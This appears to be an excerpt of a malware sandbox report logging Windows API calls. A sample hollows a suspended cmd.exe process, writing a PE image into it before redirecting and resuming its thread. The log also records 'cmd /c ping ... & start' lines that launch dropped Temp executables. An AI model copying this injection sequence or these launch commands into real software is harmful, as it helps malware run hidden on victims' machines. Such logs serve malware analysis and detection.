buffer: ErrCodeid%d&=ABCDEFGHIJKLMNOPQRTSUVWXYZ0123456789‡¦ÜsψMªK.$¥à¤Â$WN/ó_ÙåӐLòøE:ЉªK.$9”e`  b0p`àR 1 0 P p `ÀÐàð E 0 P p `ÀÐàð  b0Pp`àð ¢ 0 P p `ÀÐàðbp` b 0 P p `ÀÐàð  ’0Pp`à W 0 P p `ÀÐàð  0 P p `ÀÐàð  ¢0Pp`àð  0 P p `ÀÐàð  "0Pp`àð  0 P p `ÀÐàð  0Pp`à ’ 0 P p `ÀÐàðÒ0p` = 0 P p `ÀÐàð â 0 P p `ÀÐàð ‚ 0 P p `ÀÐàð ' 0 P p `ÀÐàð0p`p`20p`B  0 P p `ÀÐàð  0 P p `ÀÐàð h+ 0 P p `ÀÐàð"` 5 0 P p `ÀÐàð R 0 P p `ÀÐàð  B0p`à’ 0 Pp`Ààð h  0 P p `ÀÐàð  0 P p `ÀÐàðR0p`b0Pp`  0 P p `ÀÐàð  0 P p `ÀÐàð h; 0 P p `ÀÐàð  0 P p `ÀÐàðR`Âp`"0Pp`0Pp`  "0Pp`à"0p`R 0 Pp`Ààð  R0Pp`à’0p`Bp`2`  00Pp`à hâ 0 P p `ÀÐàð h7 0 P p `ÀÐàð h# 0 P p `ÀÐàð  r0Pp`à  p` % 0 P p `ÀÐàð  p`  p`  ¢0p`à  B 0p`Ààð O 0 P p `ÀÐàð‚0Pp` + 0 P p `ÀÐàðr`  ‚0p`à ó 0 P p `ÀÐàð
base_address: 0x0000000049d7e000
process_identifier: 3060
process_handle: 0x0000000000000358
1 1 0

WriteProcessMemory

buffer: 
base_address: 0x0000000049d7f000
process_identifier: 3060
process_handle: 0x0000000000000358
1 1 0

WriteProcessMemory

buffer: ÃÌàÃPÔàPäàÒ!ìàÜ!M*áP*¤+á¤+-0á-¦-Há¦-G0ÜãG0¾1Tá¾1 6Üã 6›6lá›6(;ã(;_|á_¥d”á¥dhPâh,j¬á,j‰yÀá‰y2{Tá2{ ~Øá ~ºìẁڃâڃnˆânˆâ‰hââ‰É‹,âɋ\¡8â\¡¶¨”ᶨ¹«P⹫­hâ­Ì²ã̲ɀâɎÍÄãŽÍ ÔÄå Ô0՘â0ÕÇÕ(äÇÕJÖ¤âJÖÖÖ¤âÖÖ¿Ø`ã¿ØÜÜìáÜÜNÝ°âNÝ]ÞHá`Þá0áá)á¼â)áÀêÄâÀêìÌàìóÜâóeö0áeö_ÿôâ`ÿ*ã*˜¼â¨tãtH0ãHŠ8ãŠÓPãÓz`ãz˜!tã˜!ç!Pãç!Û'PâÜ'æ+ãæ+.Üã.´.¨ã´./´ã/Ù3ÄãÙ3Ô5ÜãÔ5”Gôã”G€Hä€HüH(äüHxI0ãxIFJ0ä‰J±Ktä±K~L<ä~LøMDäøMÀPÜãÀP³RTä´R€S˜â€S}Tdä}TFVtäFVÌV°âÌVÍW€äÍWÃX”äÃXUY¤äUY¿Y°ä¿YøY¼äøYØ[TáØ[ÕaÄäÕa#eØä#e¾gÜã¾gˆqôäˆqëvåëvÎw,åÎwx,åx{y,å{y_}ìá_}€~<å€~°ƒHå°ƒ†`冶‡l嶇vˆxåvˆ‰ˆå‰0¬œå0¬®Ü㐮±8ã±b±¼âb±þ²´åþ²QµÄåQµ)¸0á)¸?»Pâ?»<Áã<ÁÔÂTáÔÂqÉÜåqɻɨã»ÉʨãÊJÊPãLÊžËäåžËêÏPâêÏÉÝôå
base_address: 0x0000000049d81000
process_identifier: 3060
process_handle: 0x0000000000000358
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@غ´ Í!¸LÍ!This program cannot be run in DOS mode. $“Ôâÿ×µŒ¬×µŒ¬×µŒ¬õՊ­ÖµŒ¬õՍ­ÒµŒ¬×µ¬ÅµŒ¬×µŒ¬ÄµŒ¬@뎭ֵŒ¬Rich×µŒ¬PEd†9”e`ð" Î$Ô!ÖI `ƒ p°à.textÊÍÎ `.rdataàÒ@@.dataÂðÚ@À.pdatapÜ@@
base_address: 0x0000000049d60000
process_identifier: 3060
process_handle: 0x0000000000000358
1 1 0
Process injection Process 2200 called NtSetContextThread to modify thread in remote process 3060
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.r14: 0
registers.r15: 0
registers.rcx: 1238770132
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 2751320
registers.r11: 0
registers.r8: 0
registers.r9: 0
registers.rip: 1998505216
registers.rdx: 8796092866560
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0
thread_handle: 0x00000000000000f8
process_identifier: 3060
1 0 0
Process injection Process 1756 resumed a thread in remote process 1120
Process injection Process 1572 resumed a thread in remote process 2244
Process injection Process 2364 resumed a thread in remote process 2200
Process injection Process 2200 resumed a thread in remote process 3060
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 1120
1 0 0

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 2244
1 0 0

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x00000000000000f8
suspend_count: 1
process_identifier: 3060
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 1160
thread_handle: 0x00000000000000ec
process_identifier: 1756
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\rldr.10.4.exe VVWDQI5
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000f0
1 1 0

CreateProcessInternalW

thread_identifier: 1332
thread_handle: 0x0000000000000060
process_identifier: 2256
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 8.8.7.7 -n 2
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000064
1 1 0

CreateProcessInternalW

thread_identifier: 2408
thread_handle: 0x0000000000000064
process_identifier: 1120
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\rldr.10.4.exe
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\rldr.10.4.exe VVWDQI5
filepath_r: C:\Users\test22\AppData\Local\Temp\rldr.10.4.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000060
1 1 0

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 1120
1 0 0

NtResumeThread

thread_handle: 0x00000000000000bc
suspend_count: 1
process_identifier: 2256
1 0 0

CreateProcessInternalW

thread_identifier: 2564
thread_handle: 0x00000000000000c4
process_identifier: 1572
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4B706.exe NHXU1K
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000ec
1 1 0

CreateProcessInternalW

thread_identifier: 2332
thread_handle: 0x0000000000000060
process_identifier: 2776
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 8.8.7.7 -n 2
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000064
1 1 0

CreateProcessInternalW

thread_identifier: 2264
thread_handle: 0x0000000000000064
process_identifier: 2244
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\RT4B706.exe
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\RT4B706.exe NHXU1K
filepath_r: C:\Users\test22\AppData\Local\Temp\RT4B706.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000060
1 1 0

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 2244
1 0 0

NtResumeThread

thread_handle: 0x00000000000000bc
suspend_count: 1
process_identifier: 2776
1 0 0

CreateProcessInternalW

thread_identifier: 804
thread_handle: 0x00000000000000ec
process_identifier: 2364
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\rT4B706.exe NICE
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000f0
1 1 0

CreateProcessInternalW

thread_identifier: 492
thread_handle: 0x0000000000000060
process_identifier: 2324
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 8.8.7.7 -n 2
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000064
1 1 0

CreateProcessInternalW

thread_identifier: 1160
thread_handle: 0x0000000000000064
process_identifier: 2200
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\RT4B706.exe
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\rT4B706.exe NICE
filepath_r: C:\Users\test22\AppData\Local\Temp\RT4B706.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000060
1 1 0

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x00000000000000c4
suspend_count: 1
process_identifier: 2324
1 0 0

CreateProcessInternalW

thread_identifier: 2296
thread_handle: 0x00000000000000f8
process_identifier: 3060
current_directory:
filepath:
track: 1
command_line: cmd.exe
filepath_r:
stack_pivoted: 0
creation_flags: 20 (CREATE_NEW_CONSOLE|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000000000000358
1 1 0

NtGetContextThread

thread_handle: 0x00000000000000f8
1 0 0

NtUnmapViewOfSection

base_address: 0x0000000049d60000
region_size: 4096
process_identifier: 3060
process_handle: 0x0000000000000358
1 0 0

NtAllocateVirtualMemory

process_identifier: 3060
region_size: 139264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000049d60000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000358
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@غ´ Í!¸LÍ!This program cannot be run in DOS mode. $“Ôâÿ×µŒ¬×µŒ¬×µŒ¬õՊ­ÖµŒ¬õՍ­ÒµŒ¬×µ¬ÅµŒ¬×µŒ¬ÄµŒ¬@뎭ֵŒ¬Rich×µŒ¬PEd†9”e`ð" Î$Ô!ÖI `ƒ p°à.textÊÍÎ `.rdataàÒ@@.dataÂðÚ@À.pdatapÜ@@
base_address: 0x0000000049d60000
process_identifier: 3060
process_handle: 0x0000000000000358
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0000000049d61000
process_identifier: 3060
process_handle: 0x0000000000000358
1 1 0

WriteProcessMemory

buffer: ErrCodeid%d&=ABCDEFGHIJKLMNOPQRTSUVWXYZ0123456789‡¦ÜsψMªK.$¥à¤Â$WN/ó_ÙåӐLòøE:ЉªK.$9”e`  b0p`àR 1 0 P p `ÀÐàð E 0 P p `ÀÐàð  b0Pp`àð ¢ 0 P p `ÀÐàðbp` b 0 P p `ÀÐàð  ’0Pp`à W 0 P p `ÀÐàð  0 P p `ÀÐàð  ¢0Pp`àð  0 P p `ÀÐàð  "0Pp`àð  0 P p `ÀÐàð  0Pp`à ’ 0 P p `ÀÐàðÒ0p` = 0 P p `ÀÐàð â 0 P p `ÀÐàð ‚ 0 P p `ÀÐàð ' 0 P p `ÀÐàð0p`p`20p`B  0 P p `ÀÐàð  0 P p `ÀÐàð h+ 0 P p `ÀÐàð"` 5 0 P p `ÀÐàð R 0 P p `ÀÐàð  B0p`à’ 0 Pp`Ààð h  0 P p `ÀÐàð  0 P p `ÀÐàðR0p`b0Pp`  0 P p `ÀÐàð  0 P p `ÀÐàð h; 0 P p `ÀÐàð  0 P p `ÀÐàðR`Âp`"0Pp`0Pp`  "0Pp`à"0p`R 0 Pp`Ààð  R0Pp`à’0p`Bp`2`  00Pp`à hâ 0 P p `ÀÐàð h7 0 P p `ÀÐàð h# 0 P p `ÀÐàð  r0Pp`à  p` % 0 P p `ÀÐàð  p`  p`  ¢0p`à  B 0p`Ààð O 0 P p `ÀÐàð‚0Pp` + 0 P p `ÀÐàðr`  ‚0p`à ó 0 P p `ÀÐàð
base_address: 0x0000000049d7e000
process_identifier: 3060
process_handle: 0x0000000000000358
1 1 0

WriteProcessMemory

buffer: 
base_address: 0x0000000049d7f000
process_identifier: 3060
process_handle: 0x0000000000000358
1 1 0

WriteProcessMemory

buffer: ÃÌàÃPÔàPäàÒ!ìàÜ!M*áP*¤+á¤+-0á-¦-Há¦-G0ÜãG0¾1Tá¾1 6Üã 6›6lá›6(;ã(;_|á_¥d”á¥dhPâh,j¬á,j‰yÀá‰y2{Tá2{ ~Øá ~ºìẁڃâڃnˆânˆâ‰hââ‰É‹,âɋ\¡8â\¡¶¨”ᶨ¹«P⹫­hâ­Ì²ã̲ɀâɎÍÄãŽÍ ÔÄå Ô0՘â0ÕÇÕ(äÇÕJÖ¤âJÖÖÖ¤âÖÖ¿Ø`ã¿ØÜÜìáÜÜNÝ°âNÝ]ÞHá`Þá0áá)á¼â)áÀêÄâÀêìÌàìóÜâóeö0áeö_ÿôâ`ÿ*ã*˜¼â¨tãtH0ãHŠ8ãŠÓPãÓz`ãz˜!tã˜!ç!Pãç!Û'PâÜ'æ+ãæ+.Üã.´.¨ã´./´ã/Ù3ÄãÙ3Ô5ÜãÔ5”Gôã”G€Hä€HüH(äüHxI0ãxIFJ0ä‰J±Ktä±K~L<ä~LøMDäøMÀPÜãÀP³RTä´R€S˜â€S}Tdä}TFVtäFVÌV°âÌVÍW€äÍWÃX”äÃXUY¤äUY¿Y°ä¿YøY¼äøYØ[TáØ[ÕaÄäÕa#eØä#e¾gÜã¾gˆqôäˆqëvåëvÎw,åÎwx,åx{y,å{y_}ìá_}€~<å€~°ƒHå°ƒ†`冶‡l嶇vˆxåvˆ‰ˆå‰0¬œå0¬®Ü㐮±8ã±b±¼âb±þ²´åþ²QµÄåQµ)¸0á)¸?»Pâ?»<Áã<ÁÔÂTáÔÂqÉÜåqɻɨã»ÉʨãÊJÊPãLÊžËäåžËêÏPâêÏÉÝôå
base_address: 0x0000000049d81000
process_identifier: 3060
process_handle: 0x0000000000000358
1 1 0

NtSetContextThread

registers.r14: 0
registers.r15: 0
registers.rcx: 1238770132
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 2751320
registers.r11: 0
registers.r8: 0
registers.r9: 0
registers.rip: 1998505216
registers.rdx: 8796092866560
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0
thread_handle: 0x00000000000000f8
process_identifier: 3060
1 0 0

NtResumeThread

thread_handle: 0x00000000000000f8
suspend_count: 1
process_identifier: 3060
1 0 0